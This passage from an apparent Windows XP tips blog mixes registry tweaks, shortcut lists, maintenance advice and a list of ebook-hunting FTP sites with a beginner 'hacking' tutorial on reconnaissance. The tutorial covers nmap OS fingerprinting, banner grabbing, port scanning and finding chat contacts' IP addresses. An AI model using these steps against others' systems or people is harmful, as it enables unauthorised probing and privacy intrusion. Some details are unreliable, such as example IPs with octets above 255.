Click the Shortcut tab, and then click the Change Icon button.

In the Look for icons in this file text box, type:
Shell32.dll.

Click OK.

Select one of the icons from the list and then click OK

You could also give it a shortcut keystroke such CTRL+ALT+L. This would save you only one keystroke from the normal command, but it could be more convenient.

Create a Password Reset Disk

2008-08-07T10:44:00.001-07:00

Create a Password Reset Disk
============================

If you?re running Windows XP Professional as a local user in a workgroup environment, you can create a password reset disk to log onto your computer when you forget your password. To create the disk:

Click Start, click Control Panel, and then click User Accounts.
Click your account name.
Under Related Tasks, click Prevent a forgotten password.

Follow the directions in the Forgotten Password Wizard to create a password reset disk.

Store the disk in a secure location, because anyone using it can access your local user account

How do I get the "Administrator" name on Welcome Screen?

2008-08-07T10:43:00.000-07:00

How do I get the "Administrator" name on Welcome Screen?
=======================================================

To get Admin account on the "Welcome Screen" as well as the other usernames, make sure that there are no accounts logged in.

Press "ctrl-alt-del" twice and you should be able to login as administrator!

finally worked for me after I found out that all accounts have to be logged out first

more to come !

Windows XP Tips Collection

2008-08-07T10:39:00.000-07:00

Windows XP Tips Collection

Here's how to check if your copy of XP is Activated
Go to the run box and type in oobe/msoobe /a
and hit ok ...

Windows Explorer Tip
When launched in Windows Millennium/Win2k/WinXP,Explorer by default will open the "My Documents" folder. Many people prefer the behavior from previous versions of Windows, where Windows Explorer would open and display "My Computer" instead of the new way. To revert to the old way [My Computer by default rather than My Documents as the default], simply edit the shortcut to Windows Explorer, by right clicking on it, and left clicking "Properties" and changing the "Target" box to: "C:\WINDOWS\EXPLORER.EXE /n,/e," [adjust the path/drive letter if needed]. The key is to add the "/n,/e," to the end of the shortcut (don't type the quotes).
Backup your Fresh install
After you complete your clean install and get all your software installed I would recommend that you use something like Drive Image 3 or 4 to do an image of your install partition, then burn the image to CD and keep it. XP is a different creature for some people. If you mess it up when playing around with it, just bring the image back. You can be up and running again in 20 minutes vs. the two to three hours it will take to get the whole thing and all your stuff installed again.
Note the default install of XP is about 1.5gigs and the DI image may be larger that 700 meg. So don't install too much on the OS partition. To help downsize the Image I run the System file checker and reset the cache size to 40 or 50 meg (It's well over 300 by default).
To run it open the command prop and type:
SFC /?
SFC /purgecache
SFC /cachesize=50
and finally rebuild the cache with SFC /scannow (have the CD ready)
I also Delete the Pagefile.sys and hibernate.sys files before running Drive Image..

1.When setting up the system with tweaks or making changes to the core OS or hardware always be logged in as administrator. Seems that while XP does create an account upon install that has administrator privileges, its not the same as the administrator account is. Think about it this way - if the account created was the same then why have an administrator account period?

2.It is always better to install winXP clean than to do an upgrade.

3. The files and settings wizard is your friend. However it doesn't save the account passwords for your e-mail and news groups accounts in OE. Export these accounts manually from within OE first before hand and save them in a safe place. This way you will not need to remember what the account info was, just import the account again.

4. If using a SB Live sound card and trying to run Unreal (the game) you may have some problems. This is not the fault of winXP or Unreal. the problem is a bad driver design from creative and the Devloader portion. There is currently no work around for this problem.

5. Many - many games do run in winXP with comparability mode. The easiest way to do this is to simply create a shortcut on the desktop to the game executable and choose the compatibility tab of the shortcut and set up for win98.

6. Do not disable all the services that you find outlined in the win2K tweak guides floating around. Instead set them to manual instead of disabled. This will allow something to start up when it is needed and you'll avoid the BSOD thing that can occur if something gets disabled that wasn't supposed to.

7. The winXP firewall is actually very good. However it is not very configurable. I would recommend tiny personal firewall from www.tinysoftware.com. It free and all you need. It so far is the most compatible with winXP - why you may ask? - because (little known trivia fun fact here) this is where the winXP firewall came from. Both the XP built in firewall and tiny will give complete stealth. However what you can do - which is kind of cool is divide the work between the two and use both. use tiny to just filter the ports you want to filter instead of everything and let the built in XP firewall take care of the rest. The result is a smoother running firewall system that reacts much more quickly. I've used Nortons , zone alarm (which contrary to popular belief is not a real firewall and a joke in the IT community as a whole) and several of the rest, Tiny has been the best so far.

8. After you complete your clean install and get all your software installed I would recommend that you use something like drive image 4 to do an image of your install partition, then burn the image to CD and keep it. XP is a different creature for some people. If you mess it up when playing around with it, just bring the image back. You can be up and running again in 20 minutes vs. the two to three hours it will take to get the whole thing and all your stuff installed again.

9. choose winXP pro over the personal version because it has more bells and whistles. However if the bells and whistles do not appeal to you then the home (personal) version is the way to go.

10. Avoid problems with WinXP. Insure that your hardware is on the HCL. Don't be mad because the latest and greatest doesn't work with your hardware. It is not the fault of MS , winXP or anything or one else. Not defending them here, just being practical. Look at it this way - if your dream car costs $100,000 dollars and you don't have $100,000 is it the car manufactures fault? nope because thats the free enterprise system and the way it works. Try to upgrade your hardware if you can. If you can't, wait for drivers from the manufacturer that support winxp. I would highly recommend before installing winXP that you go out and get the win2000 drivers for all your hardware. 99% of the win2000 drivers will work in winXP. This way if winxp doesn't have drivers, you do.

XP will ship with out the Virtual Java Machine.
It will not appear on windows update either. Some sites will prompt you to install it upon visit to their sites. However this might change in the near future due to the problem between SUN and MS so the link you get pointed to might no be there.

You can get the virtual Java machine now and have it ready to use when you install XP.
Download the VJM for winNT. If you try to d/l the one for win2000 (which is exactly the same as the one for NT) you will be told to get the service pack. You don't want to do this for XP.
keep it in a safe place and use it when you install XP.
XP browsing speed up tweak
when you connect to a web site your computer sends information back and forth, this is obvious. Some of this information deals with resolving the site name to an IP address, the stuff that tcp/ip really deals with, not words. This is DNS information and is used so that you will not need to ask for the site location each and every time you visit the site. Although WinXP and win2000 has a pretty efficient DNS cache, you can increase its overall performance by increasing its size.

You can do this with the registry entries below:

************begin copy and paste***********
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters]
"CacheHashTableBucketSize"=dword:00000001
"CacheHashTableSize"=dword:00000180
"MaxCacheEntryTtlLimit"=dword:0000fa00
"MaxSOACacheEntryTtlLimit"=dword:0000012d

************end copy and paste***********

make a new text file and rename it to dnscache.reg. The copy and paste the above into it and save it. Then merge it into the registry.

Grouping multiple open windows
WinXP will group multiple open windows (IE windows for example) into one group on the task bar to keep the desktop clear. This can be annoying at times - especially when comparing different web pages because you have to go back to the task bar, click on the group and then click on the page you want and then you only get one page because you have to click on each one separately. I think the default for this is 8 windows - any combination of apps or utilities open.

You can modify this behavior by adding this reg key at:

Change number of windows that are open before XP will start
grouping them on the Taskbar

HKEY_CURRRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\
add reg_Dword "TaskbarGroupSize"

modify "TaskbarGroupSize" entry to be the number of windows you want open before XP starts to group them on the task bar.
A value of 2 will cause the Taskbar buttons to always group

Another tweak is to disable or enable recent documents history. This can be done at:

HKEY_CURRRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\
this key should already be present - if it isn't you'll need to add it:
reg_Binary "NoRecentDocsHistory"
modify it so that value reads 01 00 00 00

Wanna network but don't have all the stuff?
If you want to network two winXP machines together you don't have to install a full blown network setup, i.e...switches, hubs, routers, etc...

All you need is two NIC cards (three if you want to share an Internet connection) and a cross over cable.

1. Connect one NIC to your broadband connection device like normal.
2. Install a second NIC in the machine with the broadband connection.
3. install a NIC in the second machine.
4. connect the cross over cable between the second machine NIC and the second NIC in the board band connection machine.
5. re-boot both.
6. Run the networking wizard if necessary.

or:
use a direct connection setup with a parallel port to parallel port connection to the two machines. You will not be able to share a connection with the direct connect.
Help is just a directory away! - Tip
In windows XP pro at C:\Windows\help - you will find many *.chm files. These are the help files. Just start one up and find what your looking for without going thru the main help menu. If for example you are interested in command line tools or command line references start up the ntcmds.chm file. If you use command line a lot for things just create a shortcut on your desktop to this file and it there when you need it.

You could go thru the Help thing to find these but on the home version some are not linked in some of the help. This is shorter.

Speed things up a bit tip
this might help some of you.

1. go to control panel - system.
2. click on the advanced tab
3. under "performance" click on the settings button
4. click on the Advanced tab
5. click on the "Background Services" button
6. Click OK

Section 3

Windows XP Tips 'n' Tricks
==========================
Please note that some of these tips require you to use a Registry Editor (regedit.exe), which could render your system unusable. Thus, none of these tips are supported in any way: Use them at your own risk. Also note that most of these tips will require you to be logged on with Administrative rights.

Unlocking WinXP's setupp.ini

Nice list of windows shortcuts

2008-08-07T10:33:00.000-07:00

Nice list of windows shortcuts
Windows shortcuts ...

CTRL+C (Copy)
CTRL+X (Cut)
CTRL+V (Paste)
CTRL+Z (Undo)
DELETE (Delete)
SHIFT+DELETE (Delete the selected item permanently without placing the item in the Recycle Bin)
CTRL while dragging an item (Copy the selected item)
CTRL+SHIFT while dragging an item (Create a shortcut to the selected item)
F2 key (Rename the selected item)
CTRL+RIGHT ARROW (Move the insertion point to the beginning of the next word)
CTRL+LEFT ARROW (Move the insertion point to the beginning of the previous word)
CTRL+DOWN ARROW (Move the insertion point to the beginning of the next paragraph)
CTRL+UP ARROW (Move the insertion point to the beginning of the previous paragraph)
CTRL+SHIFT with any of the arrow keys (Highlight a block of text)
SHIFT with any of the arrow keys (Select more than one item in a window or on the desktop, or select text in a document)
CTRL+A (Select all)
F3 key (Search for a file or a folder)
ALT+ENTER (View the properties for the selected item)
ALT+F4 (Close the active item, or quit the active program)
ALT+ENTER (Display the properties of the selected object)
ALT+SPACEBAR (Open the shortcut menu for the active window)
CTRL+F4 (Close the active document in programs that enable you to have multiple documents open simultaneously)
ALT+TAB (Switch between the open items)
ALT+ESC (Cycle through items in the order that they had been opened)
F6 key (Cycle through the screen elements in a window or on the desktop)
F4 key (Display the Address bar list in My Computer or Windows Explorer)
SHIFT+F10 (Display the shortcut menu for the selected item)
ALT+SPACEBAR (Display the System menu for the active window)
CTRL+ESC (Display the Start menu)
ALT+Underlined letter in a menu name (Display the corresponding menu)
Underlined letter in a command name on an open menu (Perform the corresponding command)
F10 key (Activate the menu bar in the active program)
RIGHT ARROW (Open the next menu to the right, or open a submenu)
LEFT ARROW (Open the next menu to the left, or close a submenu)
F5 key (Update the active window)
BACKSPACE (View the folder one level up in My Computer or Windows Explorer)
ESC (Cancel the current task)
SHIFT when you insert a CD-ROM into the CD-ROM drive (Prevent the CD-ROM from automatically playing)
Dialog Box Keyboard Shortcuts
CTRL+TAB (Move forward through the tabs)
CTRL+SHIFT+TAB (Move backward through the tabs)
TAB (Move forward through the options)
SHIFT+TAB (Move backward through the options)
ALT+Underlined letter (Perform the corresponding command or select the corresponding option)
ENTER (Perform the command for the active option or button)
SPACEBAR (Select or clear the check box if the active option is a check box)
Arrow keys (Select a button if the active option is a group of option buttons)
F1 key (Display Help)
F4 key (Display the items in the active list)
BACKSPACE (Open a folder one level up if a folder is selected in the Save As or Open dialog box)
Microsoft Natural Keyboard Shortcuts
Windows Logo (Display or hide the Start menu)
Windows Logo+BREAK (Display the System Properties dialog box)
Windows Logo+D (Display the desktop)
Windows Logo+M (Minimize all of the windows)
Windows Logo+SHIFT+M (Restore the minimized windows)
Windows Logo+E (Open My Computer)
Windows Logo+F (Search for a file or a folder)
CTRL+Windows Logo+F (Search for computers)
Windows Logo+F1 (Display Windows Help)
Windows Logo+ L (Lock the keyboard)
Windows Logo+R (Open the Run dialog box)
Windows Logo+U (Open Utility Manager)
Accessibility Keyboard Shortcuts
Right SHIFT for eight seconds (Switch FilterKeys either on or off)
Left ALT+left SHIFT+PRINT SCREEN (Switch High Contrast either on or off)
Left ALT+left SHIFT+NUM LOCK (Switch the MouseKeys either on or off)
SHIFT five times (Switch the StickyKeys either on or off)
NUM LOCK for five seconds (Switch the ToggleKeys either on or off)
Windows Logo +U (Open Utility Manager)
Windows Explorer Keyboard Shortcuts
END (Display the bottom of the active window)
HOME (Display the top of the active window)
NUM LOCK+Asterisk sign (*) (Display all of the subfolders that are under the selected folder)
NUM LOCK+Plus sign (+) (Display the contents of the selected folder)
NUM LOCK+Minus sign (-) (Collapse the selected folder)
LEFT ARROW (Collapse the current selection if it is expanded, or select the parent folder)
RIGHT ARROW (Display the current selection if it is collapsed, or select the first subfolder)
Shortcut Keys for Character Map
After you double-click a character on the grid of characters, you can move through the grid by using the keyboard shortcuts:
RIGHT ARROW (Move to the right or to the beginning of the next line)
LEFT ARROW (Move to the left or to the end of the previous line)
UP ARROW (Move up one row)
DOWN ARROW (Move down one row)
PAGE UP (Move up one screen at a time)
PAGE DOWN (Move down one screen at a time)
HOME (Move to the beginning of the line)
END (Move to the end of the line)
CTRL+HOME (Move to the first character)
CTRL+END (Move to the last character)
SPACEBAR (Switch between Enlarged and Normal mode when a character is selected)
Microsoft Management Console (MMC) Main Window Keyboard Shortcuts
CTRL+O (Open a saved console)
CTRL+N (Open a new console)
CTRL+S (Save the open console)
CTRL+M (Add or remove a console item)
CTRL+W (Open a new window)
F5 key (Update the content of all console windows)
ALT+SPACEBAR (Display the MMC window menu)
ALT+F4 (Close the console)
ALT+A (Display the Action menu)
ALT+V (Display the View menu)
ALT+F (Display the File menu)
ALT+O (Display the Favorites menu)
MMC Console Window Keyboard Shortcuts
CTRL+P (Print the current page or active pane)
ALT+Minus sign (-) (Display the window menu for the active console window)
SHIFT+F10 (Display the Action shortcut menu for the selected item)
F1 key (Open the Help topic, if any, for the selected item)
F5 key (Update the content of all console windows)
CTRL+F10 (Maximize the active console window)
CTRL+F5 (Restore the active console window)
ALT+ENTER (Display the Properties dialog box, if any, for the selected item)
F2 key (Rename the selected item)
CTRL+F4 (Close the active console window. When a console has only one console window, this shortcut closes the console)
Remote Desktop Connection Navigation
CTRL+ALT+END (Open the Microsoft Windows NT Security dialog box)
ALT+PAGE UP (Switch between programs from left to right)
ALT+PAGE DOWN (Switch between programs from right to left)
ALT+INSERT (Cycle through the programs in most recently used order)
ALT+HOME (Display the Start menu)
CTRL+ALT+BREAK (Switch the client computer between a window and a full screen)
ALT+DELETE (Display the Windows menu)
CTRL+ALT+Minus sign (-) (Place a snapshot of the active window in the client on the Terminal server clipboard and provide the same functionality as pressing PRINT SCREEN on a local computer.)
CTRL+ALT+Plus sign (+) (Place a snapshot of the entire client window area on the Terminal server clipboard and provide the same functionality as pressing ALT+PRINT SCREEN on a local computer.)
Microsoft Internet Explorer Navigation
CTRL+B (Open the Organize Favorites dialog box)
CTRL+E (Open the Search bar)
CTRL+F (Start the Find utility)
CTRL+H (Open the History bar)
CTRL+I (Open the Favorites bar)
CTRL+L (Open the Open dialog box)
CTRL+N (Start another instance of the browser with the same Web address)
CTRL+O (Open the Open dialog box, the same as CTRL+L)
CTRL+P (Open the Print dialog box)
CTRL+R (Update the current Web page)
CTRL+W (Close the current window)

more to come on run !

Performance Increase Through My Computer

2008-08-07T10:32:00.000-07:00

Performance Increase Through My Computer
1: Start > Right Click on My Computer and select properties.
2: Click on the "Advanced" tab
3: See the "Perfomance" section? Click "Settings"
4: Disable all or some of the following:

Fade or slide menus into view
Fade or slide ToolTips into view
Fade out menu items after clicking
Show Shadows under menus
Slide open combo boxes
Slide taskbar buttons
Use a background image for each folder type
Use common tasks in folders

There, now Windows will still look nice and perform faster

vanishing console program

2008-08-07T10:30:00.000-07:00

Running Vanishing Console Programs With A Click!, Ever had a console program that vanish
Ever had a console program that opens a console window, executes, and vanishes in an instant? To make console programs running in an easier way for you !

Windows Registry Editor Version 5.00

[HKEY_CLASSES_ROOT\exefile\shell\runcmd]
@="Run at Console"

[HKEY_CLASSES_ROOT\exefile\shell\runcmd\command]
@="cmd /k \"echo Executing (Press Ctrl+C to end program)...&&\"%L\"&&pause&&exit\""

[HKEY_CLASSES_ROOT\batfile\shell\runcmd]
@="Run at Console"

[HKEY_CLASSES_ROOT\batfile\shell\runcmd\command]
@="cmd /k \"echo Executing batch script...&&\"%L\"&&pause&&exit\""

type above in a file (notepad) and save as run.reg and double click on the file. Click Merge. Then try right-clicking on any console program. You should see a new option called Run at Console. That will cause console programs to run and pause for you to press a key before exiting.
/*/*/*/*/*/*/*/*/*/*/*/*/*/
N.B : those who don't know how to copy text from a Command Window, right click on the Window, and then click Mark. Mark (select) the area that you want to copy and press Enter. Data copied. Now go paste it somewhere.

SEARCH eBOOK in FTP SEARCH ENGINE :

2008-08-07T10:28:00.000-07:00

SEARCH eBOOK in FTP SEARCH ENGINE :
To find eBook in FTP Search, visit one of this website

http://search.ftphost.net/
http://www.filesearching.com/
http://reliz.ru/
http://www.narlytime.com/
http://amun.serveftp.com/
http://ftpsearch.tomsk.net/

e.g. if you want to search " Sams Teach Yourself " just type Teach Yourself, you will have some eBooks in some FTP servers.

also can be found with specific format (e.g. PDF & CHM)

Computer Maintenance Tips

2008-08-07T09:59:00.000-07:00

Computer Maintenance Tips

With the amount of information available for download on the internet, it's easy to quickly fill up your valuable hard drive space and turn your computer into a sluggish, unresponsive monster. Keeping your hard drive clean is essential to the high performance that the latest computers can achieve. Fortunately, it's a simple process; one that can easily be performed on a regular basis and, with some organization, keep your computer running like a well-oiled machine.

You can discover how much hard drive space is available on your computer by accessing the DriveSpace program in your System Tools. A pie graph will show you the amount of used and unused space for each of your drives. Check this often to keep an idea of how much space you are using.
There are six simple steps to clearing up your hard drive:

1. Uninstall unused programs.

Many times a new program will come along that looks fun to have or play with, but after a week or two you simply stop using it. These programs clutter up your drive and take up valuable space. You might be tempted to delete these programs from your drive, but doing so will cause problems. You must use the uninstall function of Windows for the program to be removed safely and completely.

2. Clean out temporary files.

When your computer is not shut down properly, it will pass information from memory into fragmented files. Also, while you are running programs, your computer will write information that it does not immediately need into temporary files. Installation files will also expand themselves into the temporary folder and will not always clean up after themselves. You can delete these temporary files safely by using the Disk Cleanup option in your System Tools.

3. Empty your internet cache.

As you surf the internet your computer stores web pages and images into a temporary internet cache so that it can quickly recall and access information when you move back and forth between pages. This backup information can quickly add up and eat hard drive space.

Whether you use Internet Explorer, Netscape, or one of the many other browsers available, emptying out your cache is quick and easy. Simply follow the instructions in the Help files located within those programs. You may also wish to set a specific maximum file size for your cache folder, so that it is not allowed to run rampant.

4. Empty your mail programs of clutter.

It's easy to browse through your email and leave old messages there, promising yourself you'll sort them out later. One or two messages don't take up much space, but hundreds certainly do. Take the time to sort through these old emails now and delete what is not important. Create folders and organize what is left. Make it a habit that when new emails come in, they are either filed immediately or thrown away. Set your email program to empty your deleted items folder each time you close your mail program.

5. Empty your recycle bin.

Once you've emptied your drive of cluttering, unecessary programs; empty your recycle bin to remove what has been placed there in the process.

6. Scandisk and Defrag.

When Windows installs programs, it will put the files it needs anywhere that it finds free space, and not directly after the last program installed. As a result, your hard drive has patches of empty space on it that are not big enough to fit a full program, and will result in a drive space error if you attempt to install something new. Scandisk your drive to check for lost file fragments and to fix any errors it finds, then Defrag to pack all of the program files together at the beginning of your drive. This will clear out those empty patches and move all of the free space you've just created to the end of your drive.

Now that you've got it clean, keep it that way. Perform this quick maintenance routine every week. For your work computer, Friday afternoon before you leave for the weekend is the perfect time. When you return to work on Monday, you'll have a computer that is clutter-free and as responsive as it should be.

Organize your surfing habits. Direct all of your downloads to the same folder, so that you can easily find them and delete them when necessary, or move them to zip disks for storage. Keep track of the programs that you install. For trial versions, note the date that they will expire on a calendar. This will remind you to uninstall the programs that you can no longer use rather than allowing them to clutter up your drive. Also, if you run into problems, keeping track of new downloaded and installed programs and the date they were installed can help you track down the cause of problems.

Remember that the cleaner your hard drive is, the better your machine will respond! In order for your computer to be user friendly, it must have a friendly user. Be your computer's best friend and clean out the cobwebs regularly.

Basic of hacking (eveything about ips) :

2008-08-04T11:03:00.000-07:00

Basic of hacking (eveything about ips) :

[size=12] [/size hello friends m posting this tutorial on ips for all the beginners .read it and enjoy. its tough but damn good dont forget to reply guys

Cool

This is a tutorial that gives all information about the internet protocol.

What this tutorial covers?

1.what is an IP address?
2.How do I find my own IP?
3.How do I find out what organization owns an IP?
4.How do I find out the IP address that are connected to me?
5.How do I find what Operating System that owns the IP?
6.How do I find out the IP of my messenger buddies?
7.How do I find out what ports and services are running using IP?
8.How do I find out if an IP is contactable?
9.How do I find out the netbois name from the IP?
10.How do I find out who is logged into a remote Windows system?
11.How do I find out the IP address from the mails received?

1.What is an IP address?
An IP address or Internet Protocol is a 32-bit number address, which is assigned to each (technically called a host) connected to the Internet.
It is the address to which different types of data are sent to your computer. It consists of 4 octets. Each octet equals 8 bits and has a range from 0 to 255.
(Every IP address on the Internet is sectioned off into classes from class A to class E, depending on a different range of numbers, but I won’t go into that here.)
Here is an example of a typical IP address:

207.144.262.77
| | | |
| | | |-- > (4th octet. 8-bits. Ranges from 0 to 255)
| | ------> (3rd octet. 8-bits. Ranges from 0 to 255)
| |----------------> (2nd octet. 8-bits. Ranges from 0 to 255)
|---------------------> (1st octet. 8-bits. Ranges from 0 to 255)

Each octet is separated by a decimal. I said earlier that an IP address is a 32-bit number or address.
There are 4 octets, which are each 8-bits.
So 8-bits + 8-bits + 8-bits + 8-bits = 32-bits.

gnzl-as50-67.eatel.net
| | | |
| | | |----> (domain belongs to a network)
| | |---------> (name of the isp or internet service provider)
| |---------------> The name assigned to that particular host.
|-------------------> (the name of the machine which is located in “gnzl” or gonzales of Louisiana)

Domains could also have suffixes behind them (ex. gnzl-as50-67.eatel.net.uk)
indicating that they are from another country. Example:
.jp = Japan
.uk = United Kingdom
.nl = Netherlands
.it = Italy
.ru = Russia
.fr = France
.eg = Egypt
.in = India

2.How do I find my own IP?
Because the IP your ISP's DHCP server hands you may not always be the same it is handy to be able to quickly find out what your IP is.
Most of the time on a LAN the DHCP server will try to hand a machine the same IP it's MAC address received the last time it requested an address, but not always.
To find out your host IP and other useful information use these commands.

Windows 9X/Me:

Use the "winipcfg" command, this will bring up a GUI dialog with all the info you will need.

Windows NT/2000/XP/etc:

Use the "ipconfig command.

C:\>ipconfig /all

Windows 2000 IP Configuration

Host Name . . . . . . . . . . . . : se-libg-adrian1
Primary DNS Suffix . . . . . . . : ads.mydomain.edu
Node Type . . . . . . . . . . . . : Hybrid
IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No
DNS Suffix Search List. . . . . . : ads.mydomain.edu
mydomains.edu
mydomain.edu

Ethernet adapter Local Area Connection:

Connection-specific DNS Suffix . : mydomains.edu
Description . . . . . . . . . . . : 3Com 3C920 Integrated Fast Ethernet
Controller (3C905C-TX Compatible)
Physical Address. . . . . . . . . : 00-B0-D0-74-A8-A4
DHCP Enabled. . . . . . . . . . . : Yes
Autoconfiguration Enabled . . . . : Yes
IP Address. . . . . . . . . . . . : 192.168.26.29
Subnet Mask . . . . . . . . . . . : 255.255.240.0
Default Gateway . . . . . . . . . : 192.168.16.100
DHCP Server . . . . . . . . . . . : 192.168.30.254
DNS Servers . . . . . . . . . . . : 192.168.20.1
192.168.25.1
192.168.30.1
129.79.1.1
129.79.5.100
Primary WINS Server . . . . . . . : 192.168.30.254
Secondary WINS Server . . . . . . : 192.168.30.253
Lease Obtained. . . . . . . . . . : Saturday, February 02, 2002 12:03:14
PM
Lease Expires . . . . . . . . . . : Sunday, February 03, 2002 12:03:14 PM

C:\>

Notice that this gives you allsorts of networking information, including your IP, Gateway, MAC Address, DNS server and Host Name.

Linux/Unix:

Use the "ifconfig" command to find the IP of the box.

bash-2.04$ /sbin/ifconfig
eth0 Link encap:Ethernet HWaddr 00:C0:F0:31:9F:10
inet addr:192.168.30.130 Bcast:192.168.31.255 Mask:255.255.240.0
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:21353979 errors:2 dropped:0 overruns:0 frame:2
TX packets:20342701 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:100
Interrupt:11 Base address:0xde00

lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:2234607 errors:0 dropped:0 overruns:0 frame:0
TX packets:2234607 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0

bash-2.04$

If you are SSH/telneting to the box and you want to find the IP you are attaching from use the "finger" command with no parameters.

bash-2.04$ finger
Login Name Tty Idle Login Time Office Office Phone
adrian Adrian Crenshaw pts/3 Feb 2 14:57 (192.168.26.29)
root root pts/0 1:53 Jan 28 17:25 (tux:2)
root root pts/1 4d Jan 25 14:57
root root pts/2 8d Jan 25 14:57 (tux:2)
bash-2.04$

3.How do I find out what organization owns an IP?
By pinging the organization gives the IP of that particular Org.
Here ive pinged Jotti.org which inturns gives there IP 62.194.194.181

C:\Documents and Settings\Cyber_saint>ping www.jotti.org

Pinging www.jotti.org [62.194.194.181] with 32 bytes of data:

Reply from 62.194.194.181: bytes=32 time=429ms TTL=249
Reply from 62.194.194.181: bytes=32 time=429ms TTL=249
Reply from 62.194.194.181: bytes=32 time=430ms TTL=249
Reply from 62.194.194.181: bytes=32 time=428ms TTL=249

Ping statistics for 62.194.194.181:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 428ms, Maximum = 430ms, Average = 429ms

4.How do I find out the IP address that are connected to me?
Here the local address is your IP and the foreign address is the
IP address that you are connected to you.
C:\WINDOWS>netstat -n

Active Connections

Proto Local Address Foreign Address State
TCP 211.124.228.98:1138 64.4.13.69:1863 ESTABLISHED
TCP 211.124.228.98:1150 64.4.12.190:1863 ESTABLISHED
TCP 211.124.228.98:6891 12.90.50.93:1978 ESTABLISHED

There is a good tool which makes this one easier called Tcpview.

5.How do I find what Operating System that owns the IP?

The easiest way to find this info is to use the "nmap" utility from here.

[root@tux adrian]# nmap -O tux.mydomains.edu or

C:\>nmap -O tux.mydomains.edu

Starting nmap V. 2.54BETA26 ( www.insecure.org/nmap/ )
Adding open port 22/tcp
Adding open port 1024/tcp
Adding open port 25/tcp
Adding open port 80/tcp
Adding open port 110/tcp
Adding open port 993/tcp
Adding open port 6002/tcp
Adding open port 5902/tcp
Adding open port 111/tcp
Adding open port 443/tcp
Adding open port 21/tcp
Adding open port 995/tcp
Adding open port 23/tcp
Adding open port 143/tcp
Adding open port 139/tcp
Adding open port 515/tcp
Interesting ports on tux.mydomains.edu (192.168.30.130):
(The 1532 ports scanned but not shown below are in state: closed)
Port State Service
21/tcp open ftp
22/tcp open ssh
23/tcp open telnet
25/tcp open smtp
80/tcp open http
110/tcp open pop-3
111/tcp open sunrpc
139/tcp open netbios-ssn
143/tcp open imap2
443/tcp open https
515/tcp open printer
993/tcp open imaps
995/tcp open pop3s
1024/tcp open kdm
5902/tcp open vnc-2
6002/tcp open X11:2

Remote operating system guess: Linux Kernel 2.4.0 - 2.4.5 (X86)
Uptime 9.033 days (since Fri Jan 25 14:55:20 2002)

Nmap run completed -- 1 IP address (1 host up) scanned in 2 seconds
[root@tux adrian]#

Notice the part in bold indicate the likely OS. Be careful about using tools like "nmap",
the site you are targeting may give your local admin a call asking why you are scanning their site.
Also make sure your copy of Nmap is up to date so it has the newest OS fingerprints, the version I used in the above example is kind of old.

You can also find out sometimes by using the "What's that site running" cgi at Netcraft,
which does a banner grab for you.

Telneting to the host and observing the intro may give you some info:

Red Hat Linux release 7.1 (Seawolf)
Kernel 2.4.2-2 on an i686
login:

and if they only have port 80 open you can telnet to that port and hit enter twice and observe the headers:

[root@tux adrian]# telnet orangutan.mydomains.edu 80
Trying 192.168.28.32...
Connected to orangutan.mydomains.edu.
Escape character is '^]'.

HTTP/1.1 400 Bad Request
Server: Microsoft-IIS/5.0
Date: Sun, 03 Feb 2002 20:51:47 GMT
Content-Type: text/html
Content-Length: 87

html head title Error /title /head body The parameter is incorrect. /body
/html Connection closed by foreign host.
[root@tux adrian]#

This technique is know as "banner grabbing".

6.How do I find out the IP of my messenger buddies?
You can find out the IP address of ur buddies only if they are
directly connected to you.This is possible only when you send a file
or when a webcam or voice service is on.

YOU------> MSN SERVER/YAHOO SERVER------>OTHER PERSON

During a file transfer or webcam or voice

YOU------>OTHER PERSON

To find the IP do a netstat -n in your command prompt

C:\WINDOWS>netstat -n

Active Connections

Proto Local Address Foreign Address State
TCP 211.124.228.98:1138 64.4.13.69:1863 ESTABLISHED
TCP 211.124.228.98:1150 64.4.12.190:1863 ESTABLISHED
TCP 211.124.228.98:6891 12.90.50.93:1978 ESTABLISHED

now after sending something a file or a pic and during the transfer or
by establishing a direct voice or webcam ..View the stats again

C:\WINDOWS>netstat -n

Active Connections

Proto Local Address Foreign Address State
TCP 211.124.228.98:1138 64.4.13.69:1863 ESTABLISHED
TCP 211.124.228.98:1150 64.4.12.190:1863 ESTABLISHED
TCP 211.124.228.98:6891 12.90.50.93:1978 ESTABLISHED
TCP 211.124.228.98:6891 261.184.172.78:1337 ESTABLISHED

There is a new connection that is estabilished and the IP address is
261.184.172.78.

Its better you use Tcpview for this one as you can monitor the connections
seperately for every services.

7.How do I find out what ports and services are running using an IP?

Well there is a load of port scanners available in the net.I recommend
you to use Superscan and to find the services u can just do a netstat in
the command prompt without resolving the IP address

C:\>netstat

Active Connections

Proto Local Address Foreign Address State
TCP se-sscs-cv112b7:1370 se-cser-fs01.mydomains.edu:netbios-ssn ESTABLISHED
TCP se-sscs-cv112b7:1469 ntemail1-tr.mydomains.state.edu:1078 ESTABLISHED
TCP se-sscs-cv112b7:1473 ntemail1-tr.mydomains.state.edu:1091 ESTABLISHED
TCP se-sscs-cv112b7:1495 ntemail1-tr.mydomains.state.edu:1078 ESTABLISHED
TCP se-sscs-cv112b7:1499 ntemail1-tr.mydomains.state.edu:1091 ESTABLISHED
TCP se-sscs-cv112b7:1631 tux.mydomains.edu:telnet ESTABLISHED
TCP se-sscs-cv112b7:1690 bl-uits-adsdc01.ads.mydomain.edu:microsoft-ds TIME_WA
IT
TCP se-sscs-cv112b7:1692 se-cser-app1.mydomains.edu:microsoft-ds ESTABLISHED
TCP se-sscs-cv112b7:1694 bl-uits-adsdc01.ads.mydomain.edu:microsoft-ds TIME_WA
IT
TCP se-sscs-cv112b7:1699 homepages1.mydomains.edu:netbios-ssn TIME_WAIT

For better information, like what binary has a post open use a tool like Fport

C:\>fport
FPort v2.0 - TCP/IP Process to Port Mapper
Copyright 2000 by Foundstone, Inc.
http://www.foundstone.com

Pid Process Port Proto Path
